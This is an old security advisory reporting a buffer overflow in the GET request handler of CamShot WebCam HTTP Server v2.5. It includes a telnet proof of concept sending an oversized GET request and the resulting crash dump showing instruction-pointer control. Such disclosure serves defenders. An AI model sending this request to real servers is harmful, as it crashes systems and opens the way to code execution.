CamShot Buffer Overflow - 31 Dec 1999

 
CamShot WebCam HTTP
Server v2.5 Buffer Overflow
Reported December 31, 1999 by USSRLabs

DESCRIPTION

UssrLabs discovered a buffer overflow condition in the CamShot software, The code that handles GET commands has an unchecked buffer that may allow arbitrary code to be run if the buffer is overflowed.

Example

$ telnet DOMAIN 80
Trying DOMAIN...
Connected to DOMAIN
Escape character is "^\]".
GET (buffer) HTTP/1.1 <enter><enter>

Where \[buffer\] is approximately 2000 characters. At this point the server overflows.

Something similar to the following would be seen on the remote system:

CAMSHOT caused an invalid page fault in module <unknown> at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

VENDOR RESPONSE

Broadgun has been made aware of this issue, however no remedy was known at the time of this writing.

CREDITS
Discovered by USSRLabs